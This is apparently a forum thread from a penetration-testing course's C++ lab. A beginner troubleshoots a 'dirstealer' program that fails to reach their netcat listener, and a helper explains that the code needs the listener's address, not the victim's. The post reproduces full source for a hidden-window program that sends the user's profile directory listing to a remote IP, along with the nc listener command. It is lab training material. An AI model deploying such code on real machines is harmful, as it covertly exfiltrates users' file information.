Can't receive dirstealer or keylogger info after listening on C++ Labs

,

Hi guys,

I’m stuck on the C++ labs. I’ve tried lots of things but no success.

I compiled both the C++ code on the victim machine and it produced the exe files. I tried using netcat as such:

nc -lvp [port number]
listening on [any] [port number] …

I used the port number that was listed shown for making connection via rdesktop.

When I try to execute the code on the victim’s computer I get no response from the terminal on Kali.

The same issue with the keylogger exe file.

I used the previously made CPP files on the victims computer to make the exe files.

Am I doing something wrong? Any suggestions? I would gladly appreciate your help as I am new to penetration testing.

you may provide the actual commands you used and the source code in order to help specificly

I signed in as Kali, not root.

I connected via rdesktop:

sudo rdesktop 172.16.160.155:65520

With the dirstealer cpp file i used this source code that was pre-made and i changed the ip address and port number:

#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, “Ws2_32.lib”)
#include
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include

char* userDirectory()
{
char* pPath;
pPath = getenv (“USERPROFILE”);
if (pPath!=NULL)
{
//printf("%s\n", pPath);
return pPath;
} else {
perror("");
} //otherwise exit
}

int main()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
WSADATA WSAData;
SOCKET server;
SOCKADDR_IN addr;

WSAStartup(MAKEWORD(2, 0), &WSAData);
server = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_addr.s_addr = inet_addr("172.16.160.155"); // your listening IP
addr.sin_family = AF_INET;
addr.sin_port = htons(65520); //your listening port
connect(server, (SOCKADDR *)&addr, sizeof(addr));

//printf("conntected");

char* pPath = userDirectory();
send(server, pPath, sizeof(pPath), 0);

DIR *dir;
struct dirent *ent;
if ((dir = opendir (pPath)) != NULL) {
    /* print all the files and directories within directory */
 	while ((ent = readdir (dir)) != NULL) {
    	send(server, ent->d_name, sizeof(ent->d_name), 0);
  	}
	closedir (dir);
} else {
	  /* could not open directory */
	perror ("");
}
////clean up
closesocket(server);
WSACleanup();	

}

Then I tried to use netcat:

┌──(kali㉿kali)-[~]
└─$ nc -lvp 65520
listening on [any] 65520 …

I went back to the victim’s machine and double clicked the exe file. Nothing happens. I click run in dev++ nothing happens. I don’t know what I’m doing wrong.

1 Like

well, thats the victims address, isnt it?

yes. wasn’t sure if i was supposed to use that address or mine. if config to find mine right? under tap0?

yeah, well you want to connect to your listener, right? so you need the address of the listener - which is probably your tap0, right

please properly format code listings by using ```
but yes, when you listener received the dir listing, it seems to work as expected

Good thanks. Total newbie to this penetration testing so thank for your help.

1 Like